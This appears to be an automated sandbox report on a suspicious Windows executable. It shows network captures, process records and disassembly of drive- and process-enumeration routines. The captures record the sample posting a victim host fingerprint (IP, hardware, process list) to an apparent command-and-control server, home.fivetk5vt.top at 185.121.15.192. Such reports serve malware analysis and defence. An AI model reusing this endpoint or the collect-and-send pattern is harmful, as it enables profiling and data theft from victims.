                                                          Dec 20, 2024 17:15:20.348651886 CET2472OUTData Raw: 35 35 78 35 31 33 62 76 77 4d 35 51 63 67 5a 42 2b 4f 74 75 33 6a 47 4f 5c 2f 72 58 30 58 2b 30 5a 71 31 6e 63 2b 49 64 42 30 61 32 76 37 4b 38 66 54 4e 4f 75 37 6d 63 57 64 31 46 64 4c 44 4c 71 46 30 6b 4a 6a 6b 61 46 6e 45 63 77 58 54 6b 5a 6f
                                                          Data Ascii: 55x513bvwM5QcgZB+Otu3jGO\/rX0X+0Zq1nc+IdB0a2v7K8fTNOu7mcWd1FdLDLqF0kJjkaFnEcwXTkZopNkqq0bMoV0J+dK\/wBL\/o84KjhfCfhzEUpQn\/as8yzSc6bUozWIzHE0qElJN818JQwzvutuh\/jr9KvMa+N8cOLsLWjUp\/2LDJ8mhTqKUZ03hcpwlbEwcGly8uPxOLVtn8W8mM2D3\/z+FMf7x\/D+Qqamd3+
                                                          Dec 20, 2024 17:15:20.348728895 CET2472OUTData Raw: 56 48 4a 32 5c 2f 48 2b 6c 53 55 55 41 56 36 4b 65 5c 2f 58 38 50 36 6d 6d 55 48 51 52 79 64 76 78 5c 2f 70 56 62 37 7a 64 38 66 30 48 2b 66 31 71 37 55 63 67 37 5c 2f 67 52 5c 2f 6e 38 61 44 53 6e 31 2b 58 36 6b 47 77 65 5c 2f 2b 66 77 71 4b 72
                                                          Data Ascii: VHJ2\/H+lSUUAV6Ke\/X8P6mmUHQRydvx\/pVb7zd8f0H+f1q7Ucg7\/gR\/n8aDSn1+X6kGwe\/+fwqKrFRydvxoNCv5fv+n\/16jqxTX+6fw\/mKDop1N9P67r+u2pDUOD\/d\/wDQv8amoqORef8AXyOgr0zun0P8qfRS9n5\/h\/wQIn6\/h\/U0ypJO341HWht7Xzl\/XzKsvf8A3v8AGm+X8z9ev4f5H+cVcqvQdRE6bf
                                                          Dec 20, 2024 17:15:20.348819017 CET2472OUTData Raw: 33 6b 5c 2f 77 43 58 66 79 76 33 48 46 72 5c 2f 41 4a 2b 6c 48 37 6e 61 6d 38 38 33 48 5c 2f 4c 50 6e 79 50 35 5c 2f 77 43 65 5c 2f 46 51 74 49 56 6a 52 39 6e 2b 66 54 70 2b 48 66 30 37 30 65 57 6e 7a 72 39 79 50 5c 2f 56 65 58 36 64 50 5c 2f 41
                                                          Data Ascii: 3k\/wCXfyv3HFr\/AJ+lH7nam883H\/LPnyP5\/wCe\/FQtIVjR9n+fTp+Hf070eWnzr9yP\/VeX6dP\/ANf+NBp7Ty\/H\/gA2z5HeHen\/AE0PT\/p69e9Vvu\/cf5\/+en\/PH\/6\/+ee9n7sfyJjjH7\/n\/R\/89uv400qVV38npH\/M1p7Ty\/H\/AIBoH+23z+Z+6\/d\/8tfT\/GoI\/wDpp\/yz+z\/u4wen\/P0P
                                                          Dec 20, 2024 17:15:20.348834991 CET2472OUTData Raw: 43 33 78 51 6f 35 42 51 34 39 7a 72 68 5c 2f 4f 4a 5a 4a 6e 6c 48 2b 30 36 4f 66 34 33 45 34 66 45 79 7a 47 46 66 45 7a 77 38 63 52 4e 7a 78 64 58 47 31 63 52 69 73 52 52 78 54 6f 51 72 55 5c 2f 72 4f 4c 68 67 73 78 78 46 47 46 57 6a 6c 32 50 71
                                                          Data Ascii: C3xQo5BQ49zrh\/OJZJnlH+06Of43E4fEyzGFfEzw8cRNzxdXG1cRisRRxToQrU\/rOLhgsxxFGFWjl2Pq0PQ5LGZR8qb0+n1z1I7fWoTE6nDKV+oqez1G1uoxNp91bXUJxiW1niuIz6YkiZlOR79Pap7zVYbO0mub\/LwW6F5GCljgcAKqgszMxCoo5ZiFHJr7b93ye19ovZ8rnz80eTlSu5c23Kkm73tufnf+0e0VLkn7RyUO
                                                          Dec 20, 2024 17:15:20.348962069 CET2472OUTData Raw: 46 5a 74 44 4a 5c 2f 62 5a 2b 47 4e 39 38 57 76 67 6e 6f 36 79 66 44 33 34 4a 2b 50 37 36 78 76 33 38 4a 61 62 65 79 65 4c 4e 51 31 79 78 30 6a 77 74 6f 46 31 41 78 54 78 46 66 36 66 6a 55 4b 5c 2f 48 65 4e 75 4f 5c 2f 6f 5c 2f 63 65 5a 46 53 34
                                                          Data Ascii: FZtDJ\/bZ+GN98Wvgno6yfD34J+P76xv38JabeyeLNQ1yx0jwtoF1AxTxFf6fjUK\/HeNuO\/o\/ceZFS4f4v4mybOsmzCnlGdUcBh8fnVGtX+s5picpympB5HLD5isRWzfDYvLoYFTjiHjqFXC1sN7Wm4L988N\/Df6Ufh3xHiuKfD7gviPJM+yalmuV4vM62V5DiqGDwyoZbPM3VhxDSxeV\/U\/q2Z5ZWWZOlLDOhjMPXw2K
                                                          Dec 20, 2024 17:15:20.468395948 CET4944OUTData Raw: 35 4f 33 34 5c 2f 77 42 4b 6e 62 6f 76 30 5c 2f 6f 4b 5a 57 5a 30 45 63 6e 62 38 66 36 56 48 56 69 6f 32 62 73 50 78 50 38 41 68 51 62 65 5c 2f 77 44 33 66 78 4b 64 51 76 38 41 65 50 34 66 79 46 58 57 42 62 38 38 31 48 73 50 74 5c 2f 6e 38 4b 44
                                                          Data Ascii: 5O34\/wBKnbov0\/oKZWZ0Ecnb8f6VHVio2bsPxP8AhQbe\/wD3fxKdQv8AeP4fyFXWBb881HsPt\/n8KDenU\/Wztv8A1\/XnUqOX75\/z3NWcff75\/n1\/rVb\/AJaf5\/u1t7\/938Sxkn3fv\/5\/M\/4\/hxUP578\/59sY\/wA4qeXv\/u\/41B3\/AL\/58fzFYnQD9fw\/qarv1\/Cpagk\/74\/z\/n396DoK7B\/
                                                          Dec 20, 2024 17:15:20.468471050 CET4944OUTData Raw: 71 61 34 75 4b 66 6f 61 35 56 78 4c 78 4e 6e 66 45 6b 65 4e 38 37 79 32 72 6e 75 63 59 33 4e 63 56 51 77 6c 4b 6a 47 33 31 37 68 76 45 38 4c 54 6f 4b 73 75 57 72 4f 47 48 79 5c 2f 47 59 6a 45 59 46 56 70 56 6f 59 4c 4d 70 54 78 57 47 68 53 70 34
                                                          Data Ascii: qa4uKfoa5VxLxNnfEkeN87y2rnucY3NcVQwlKjG317hvE8LToKsuWrOGHy\/GYjEYFVpVoYLMpTxWGhSp4rMMPjO7gr9oHnnCHBPDHBb8OuHs3w3C+ByvC4LFY6viJTqVcpzzEcQUKlWi5SoqnicdXjSx8aEKFXF4LDYPD1q0pYLB1sP5v4d+MniP45fFRfHut+ILrxfqWp\/s2fsrWXxM8WahpuvaZquv\/AB\/8N\/Af4c+Gv


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.749710185.121.15.192807672C:\Users\user\Desktop\28PCC9oa8s.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 17:15:22.029805899 CET12360OUTPOST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                          Host: home.fivetk5vt.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 444875
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 33 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734711316", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                          Dec 20, 2024 17:15:22.154478073 CET2472OUTData Raw: 61 55 76 68 68 4f 55 30 34 6e 42 30 55 39 6c 78 79 4f 6e 38 71 5a 58 39 45 48 34 4f 46 46 46 46 42 70 54 36 5c 2f 4c 39 53 46 34 2b 51 5c 2f 76 5c 2f 41 4a 5c 2f 58 5c 2f 50 6f 32 72 46 66 73 48 5c 2f 77 54 47 5c 2f 59 6c 2b 43 48 37 57 76 67 5c
                                                          Data Ascii: aUvhhOU04nB0U9lxyOn8qZX9EH4OFFFFBpT6\/L9SF4+Q\/v\/AJ\/X\/Po2rFfsH\/wTG\/Yl+CH7Wvg\/4ran8WIvFgvvBPiPw3YaRP4X8QroxktNb03Uri4ivo57DUoZvJm0xGtniit5F+0XCzvOvkLB+f8AiZ4kZH4VcLVuLuIcJm2My2jjcHgZUMmoYPEY51sbOVOlKNPHY7LqDpxcW6jeJUkrcsJvQ\/U\/CLwo4j8aOM
                                                          Dec 20, 2024 17:15:22.154509068 CET2472OUTData Raw: 39 36 44 65 47 5c 2f 77 41 76 31 52 44 5c 2f 41 4e 2b 33 6b 5c 2f 37 64 66 38 5c 2f 30 77 65 39 48 2b 35 4a 39 2b 58 39 37 48 7a 35 2b 61 66 38 41 4a 77 5c 2f 2b 6f 66 72 4c 7a 6a 31 5c 2f 7a 78 52 35 62 79 66 36 35 2b 49 2b 4f 50 38 41 50 54 30
                                                          Data Ascii: 96DeG\/wAv1RD\/AN+3k\/7df8\/0we9H+5J9+X97Hz5+af8AJw\/+ofrLzj1\/zxR5byf65+I+OP8APT0\/zivZeUfu\/wCAakO4xrNs+\/8A1\/z9DTPM+X50+fzfK+zyS\/p+tP5\/1h7fxxj\/AF3+f6USN9xP9HRPN83zJJeg\/wA\/jXKaw2+f6IYzfwfu0m\/55x\/59T3\/AKVDJ\/y2H7tP3vf9\/wCT\/wCSP\/18
                                                          Dec 20, 2024 17:15:22.154548883 CET4944OUTData Raw: 6e 64 57 68 6b 47 4f 68 57 79 33 42 30 63 46 6a 63 77 77 57 55 38 4f 59 33 4d 73 75 78 57 62 4c 43 59 76 45 59 65 6f 73 48 68 46 6c 38 59 56 61 75 47 62 71 77 56 61 6d 6c 46 2b 30 69 70 5c 2f 6f 73 6e 77 4c 6c 30 72 54 57 50 68 7a 78 5a 70 65 72
                                                          Data Ascii: ndWhkGOhWy3B0cFjcwwWU8OY3MsuxWbLCYvEYeosHhFl8YVauGbqwVamlF+0ip\/osnwLl0rTWPhzxZperW8JLi38QRp4S1IqV3yO0t1eX3hqOCEcefdeJbSWXG4WkZOwcq+leEtIAbxD4wgubgBC2keDbM+IruKTO5oLzWLmfSfDMUbJhVvdF1bxL5Uj\/ADWb7GU9z8NPiZp\/xe+Cmn+PtNt57SPWtCuReW00E8KW2r2UbWW
                                                          Dec 20, 2024 17:15:22.158653975 CET2472OUTData Raw: 4c 48 37 7a 5c 2f 79 62 5c 2f 48 5c 2f 50 70 54 5c 2f 4c 5c 2f 64 77 5c 2f 75 50 6b 39 35 66 33 48 32 6a 39 66 70 5c 2f 55 55 78 59 39 30 65 2b 48 35 50 33 6f 5c 2f 31 6e 2b 6f 5c 2f 77 44 31 66 6e 57 33 74 66 4f 58 39 66 4d 31 70 66 5a 2b 66 36
                                                          Data Ascii: LH7z\/yb\/H\/PpT\/L\/dw\/uPk95f3H2j9fp\/UUxY90e+H5P3o\/1n+o\/wD1fnW3tfOX9fM1pfZ+f6jPvfudkePK82L972\/5+v8APrTPLdR8\/wAj+b\/y17c\/8un6dvfPFTb\/AJtjvsh\/1R\/df8sM\/wCT296Pn8tH2R7LjPv\/AC\/z+NUAzd5snmIkif8ALX\/Vef0x\/Pr\/AJ4Z\/q9\/z7+f9X5vnwf5HY+v
                                                          Dec 20, 2024 17:15:22.158689022 CET2472OUTData Raw: 35 35 78 35 31 33 62 76 77 4d 35 51 63 67 5a 42 2b 4f 74 75 33 6a 47 4f 5c 2f 72 58 30 58 2b 30 5a 71 31 6e 63 2b 49 64 42 30 61 32 76 37 4b 38 66 54 4e 4f 75 37 6d 63 57 64 31 46 64 4c 44 4c 71 46 30 6b 4a 6a 6b 61 46 6e 45 63 77 58 54 6b 5a 6f
                                                          Data Ascii: 55x513bvwM5QcgZB+Otu3jGO\/rX0X+0Zq1nc+IdB0a2v7K8fTNOu7mcWd1FdLDLqF0kJjkaFnEcwXTkZopNkqq0bMoV0J+dK\/wBL\/o84KjhfCfhzEUpQn\/as8yzSc6bUozWIzHE0qElJN818JQwzvutuh\/jr9KvMa+N8cOLsLWjUp\/2LDJ8mhTqKUZ03hcpwlbEwcGly8uPxOLVtn8W8mM2D3\/z+FMf7x\/D+Qqamd3+
                                                          Dec 20, 2024 17:15:22.158793926 CET4944OUTData Raw: 56 48 4a 32 5c 2f 48 2b 6c 53 55 55 41 56 36 4b 65 5c 2f 58 38 50 36 6d 6d 55 48 51 52 79 64 76 78 5c 2f 70 56 62 37 7a 64 38 66 30 48 2b 66 31 71 37 55 63 67 37 5c 2f 67 52 5c 2f 6e 38 61 44 53 6e 31 2b 58 36 6b 47 77 65 5c 2f 2b 66 77 71 4b 72
                                                          Data Ascii: VHJ2\/H+lSUUAV6Ke\/X8P6mmUHQRydvx\/pVb7zd8f0H+f1q7Ucg7\/gR\/n8aDSn1+X6kGwe\/+fwqKrFRydvxoNCv5fv+n\/16jqxTX+6fw\/mKDop1N9P67r+u2pDUOD\/d\/wDQv8amoqORef8AXyOgr0zun0P8qfRS9n5\/h\/wQIn6\/h\/U0ypJO341HWht7Xzl\/XzKsvf8A3v8AGm+X8z9ev4f5H+cVcqvQdRE6bf
                                                          Dec 20, 2024 17:15:22.164149046 CET2472OUTData Raw: 43 33 78 51 6f 35 42 51 34 39 7a 72 68 5c 2f 4f 4a 5a 4a 6e 6c 48 2b 30 36 4f 66 34 33 45 34 66 45 79 7a 47 46 66 45 7a 77 38 63 52 4e 7a 78 64 58 47 31 63 52 69 73 52 52 78 54 6f 51 72 55 5c 2f 72 4f 4c 68 67 73 78 78 46 47 46 57 6a 6c 32 50 71
                                                          Data Ascii: C3xQo5BQ49zrh\/OJZJnlH+06Of43E4fEyzGFfEzw8cRNzxdXG1cRisRRxToQrU\/rOLhgsxxFGFWjl2Pq0PQ5LGZR8qb0+n1z1I7fWoTE6nDKV+oqez1G1uoxNp91bXUJxiW1niuIz6YkiZlOR79Pap7zVYbO0mub\/LwW6F5GCljgcAKqgszMxCoo5ZiFHJr7b93ye19ovZ8rnz80eTlSu5c23Kkm73tufnf+0e0VLkn7RyUO
                                                          Dec 20, 2024 17:15:22.164208889 CET2472OUTData Raw: 46 5a 74 44 4a 5c 2f 62 5a 2b 47 4e 39 38 57 76 67 6e 6f 36 79 66 44 33 34 4a 2b 50 37 36 78 76 33 38 4a 61 62 65 79 65 4c 4e 51 31 79 78 30 6a 77 74 6f 46 31 41 78 54 78 46 66 36 66 6a 55 4b 5c 2f 48 65 4e 75 4f 5c 2f 6f 5c 2f 63 65 5a 46 53 34
                                                          Data Ascii: FZtDJ\/bZ+GN98Wvgno6yfD34J+P76xv38JabeyeLNQ1yx0jwtoF1AxTxFf6fjUK\/HeNuO\/o\/ceZFS4f4v4mybOsmzCnlGdUcBh8fnVGtX+s5picpympB5HLD5isRWzfDYvLoYFTjiHjqFXC1sN7Wm4L988N\/Df6Ufh3xHiuKfD7gviPJM+yalmuV4vM62V5DiqGDwyoZbPM3VhxDSxeV\/U\/q2Z5ZWWZOlLDOhjMPXw2K
                                                          Dec 20, 2024 17:15:22.280625105 CET2472OUTData Raw: 35 4f 33 34 5c 2f 77 42 4b 6e 62 6f 76 30 5c 2f 6f 4b 5a 57 5a 30 45 63 6e 62 38 66 36 56 48 56 69 6f 32 62 73 50 78 50 38 41 68 51 62 65 5c 2f 77 44 33 66 78 4b 64 51 76 38 41 65 50 34 66 79 46 58 57 42 62 38 38 31 48 73 50 74 5c 2f 6e 38 4b 44
                                                          Data Ascii: 5O34\/wBKnbov0\/oKZWZ0Ecnb8f6VHVio2bsPxP8AhQbe\/wD3fxKdQv8AeP4fyFXWBb881HsPt\/n8KDenU\/Wztv8A1\/XnUqOX75\/z3NWcff75\/n1\/rVb\/AJaf5\/u1t7\/938Sxkn3fv\/5\/M\/4\/hxUP578\/59sY\/wA4qeXv\/u\/41B3\/AL\/58fzFYnQD9fw\/qarv1\/Cpagk\/74\/z\/n396DoK7B\/
                                                          Dec 20, 2024 17:15:22.280704975 CET7416OUTData Raw: 33 58 61 5c 2f 77 43 38 65 50 70 7a 2b 48 70 2b 4a 39 2b 39 4d 32 76 74 68 2b 51 6f 5c 2f 77 44 71 70 5a 50 5c 2f 41 47 31 5c 2f 6c 5c 2f 6e 69 72 52 56 5c 2f 4d 54 66 35 6e 2b 75 5c 2f 35 5a 79 5c 2f 75 50 38 41 36 31 52 37 58 33 37 33 2b 51 2b
                                                          Data Ascii: 3Xa\/wC8ePpz+Hp+J9+9M2vth+Qo\/wDqpZP\/AG1\/l\/nirRV\/MTf5n+u\/5Zy\/uP8A61R7X373+Q+d5X7z\/lr\/AC+nX+dHs\/P8P+CAzy\/3cKM5dP8ASPN\/Kj5AqPM\/l\/8APXt\/o\/8An8fyok3yK6fc69\/8jnn8KZ5j8On2fyfXyv3H\/Xraf5OazOghb729EkTy\/wBP8\/57UpR\/4E2eZ\/y09x\/ntUv+


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.749716185.121.15.192807672C:\Users\user\Desktop\28PCC9oa8s.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 17:15:23.775986910 CET87OUTGET /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                          Host: home.fivetk5vt.top
                                                          Accept: */*
                                                          Dec 20, 2024 17:15:25.072978020 CET212INHTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.74970198.85.100.804437672C:\Users\user\Desktop\28PCC9oa8s.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-20 16:15:16 UTC52OUTGET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
                                                          2024-12-20 16:15:16 UTC224INHTTP/1.1 200 OK
                                                          Date: Fri, 20 Dec 2024 16:15:16 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
                                                          2024-12-20 16:15:16 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                          Data Ascii: { "origin": "8.46.123.189"}


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:11:15:12
                                                          Start date:20/12/2024
                                                          Path:C:\Users\user\Desktop\28PCC9oa8s.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\28PCC9oa8s.exe"
                                                          Imagebase:0xb0000
                                                          File size:4'450'816 bytes
                                                          MD5 hash:8A549F15D1418FB4207AADB4BA813A36
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:11:15:24
                                                          Start date:20/12/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1144
                                                          Imagebase:0xa80000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:0.1%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:44
                                                            Total number of Limit Nodes:2
                                                            execution_graph 12846 6db0ad1 12847 6db0af1 12846->12847 12852 6db0bef 12847->12852 12853 6db0bfe GetLogicalDrives 12852->12853 12855 6db0d84 12853->12855 12956 6db0bf9 12957 6db0c21 GetLogicalDrives 12956->12957 12959 6db0d84 12957->12959 12838 6e0035b 12839 6e0035e Process32FirstW 12838->12839 12841 6e0037a 12838->12841 12839->12841 13097 6db099d 13098 6db0999 13097->13098 13098->13097 13099 6db0bef GetLogicalDrives 13098->13099 13100 6db0be4 13099->13100 13101 6db0d5f GetLogicalDrives 13100->13101 13102 6db0d84 13101->13102 12833 6db0d92 12834 6db0d5a GetLogicalDrives 12833->12834 12835 6db0d58 12833->12835 12837 6db0d84 12834->12837 12836 6db0d5f GetLogicalDrives 12835->12836 12835->12837 12836->12837 13107 6db098b 13108 6db0999 13107->13108 13109 6db0bef GetLogicalDrives 13108->13109 13110 6db0be4 GetLogicalDrives 13109->13110 13112 6db0d84 13110->13112 13054 6e0003e 13055 6e0004d Process32FirstW 13054->13055 13057 6e0037a 13055->13057 13058 6e00000 13059 6e00012 13058->13059 13064 6e00033 13059->13064 13065 6e00038 Process32FirstW 13064->13065 13067 6e0037a 13065->13067 12966 6db0bbd 12967 6db0bca 12966->12967 12969 6db0be4 GetLogicalDrives 12966->12969 12968 6db0bef GetLogicalDrives 12967->12968 12968->12969 12971 6db0d84 12969->12971 13068 6e00007 13069 6e00033 Process32FirstW 13068->13069 13070 6e00022 Process32FirstW 13068->13070 13069->13070 13072 6e0037a 13070->13072

                                                            Executed Functions

                                                            Function 06DA08F3 Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: dc8de665a920d87a6c480c8ae178a15b8944de78e17bef609367a507f551ed30
                                                            • Instruction ID: 594245a7051acb0c118118be355df07e84f8d939bd35ac416633e6510b2ffcde
                                                            • Opcode Fuzzy Hash: dc8de665a920d87a6c480c8ae178a15b8944de78e17bef609367a507f551ed30
                                                            • Instruction Fuzzy Hash: CA51E1F740C311FDB7C296855B50AFA6B7EAA9B33C7308522F4CBA5602E294CB4951F1
                                                            Function 06DA068F Relevance: 4.2, Strings: 3, Instructions: 466COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$X$`
                                                            • API String ID: 0-3824400993
                                                            • Opcode ID: d0c14339e01008c837da72b7d6fe04bfaafb6fd077760e576bbb19fb72ec618a
                                                            • Instruction ID: 02555cce46b15117d05b66c3566d57425d8eac58e405a42c0fb0bf8e00b010e8
                                                            • Opcode Fuzzy Hash: d0c14339e01008c837da72b7d6fe04bfaafb6fd077760e576bbb19fb72ec618a
                                                            • Instruction Fuzzy Hash: 34A103F780C310BEF78196815B44BFA7B7EE7D6339F308426F487A5542E3A88A4945B1
                                                            Function 06DB09EC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 322COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 113 6db09ec-6db09fa 114 6db0999-6db09a5 113->114 115 6db09fc 113->115 118 6db09f3-6db09fc 114->118 119 6db09a7-6db09cb 114->119 116 6db09fe-6db0d59 call 6db0bef 115->116 161 6db0d5f-6db0d79 GetLogicalDrives 116->161 118->116 119->113 162 6db0d84-6db0dd0 call 6db0ddc 161->162 166 6db0dd5-6db0de5 call 6db0deb 162->166 169 6db0de7-6db0de9 166->169 170 6db0dc6-6db0dcf 166->170 170->166 171 6db0dd0 call 6db0ddc 170->171 171->166
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: a8310e4a57269b4799302c18dfc24c61430abb293e4fc4dee6bbb4d56c415afa
                                                            • Instruction ID: 65063077e9290698e43ca31c9dc321277e78413f537df15589629158e747cbdb
                                                            • Opcode Fuzzy Hash: a8310e4a57269b4799302c18dfc24c61430abb293e4fc4dee6bbb4d56c415afa
                                                            • Instruction Fuzzy Hash: 1F51F2EB54C111FD738291856B14EFB6B7EE5C2730730A83AF483C664AE6E48E4A51B1
                                                            Function 06DB099D Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 316COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 172 6db099d-6db09a5 173 6db09f3-6db09fc 172->173 174 6db09a7-6db09fa 172->174 176 6db09fe-6db0d59 call 6db0bef 173->176 184 6db0999-6db099b 174->184 185 6db09fc 174->185 220 6db0d5f-6db0d79 GetLogicalDrives 176->220 184->172 185->176 221 6db0d84-6db0dd0 call 6db0ddc 220->221 225 6db0dd5-6db0de5 call 6db0deb 221->225 228 6db0de7-6db0de9 225->228 229 6db0dc6-6db0dcf 225->229 229->225 230 6db0dd0 call 6db0ddc 229->230 230->225
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\
                                                            • API String ID: 0-3379428675
                                                            • Opcode ID: 28507c8846350216a4ef81b3de169a8f6bd8e737d1026218c5715f3e20548de6
                                                            • Instruction ID: e22c1d0592c3b75aa532b37d04c02a8c2f78077ccb39cbb3d384d6531eb122bb
                                                            • Opcode Fuzzy Hash: 28507c8846350216a4ef81b3de169a8f6bd8e737d1026218c5715f3e20548de6
                                                            • Instruction Fuzzy Hash: 1051F4EB54C211FD738291952F14EFBAB7EE5C3730730A83AF483C664AE6D48A4951B1
                                                            Function 06DB09E3 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 306COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
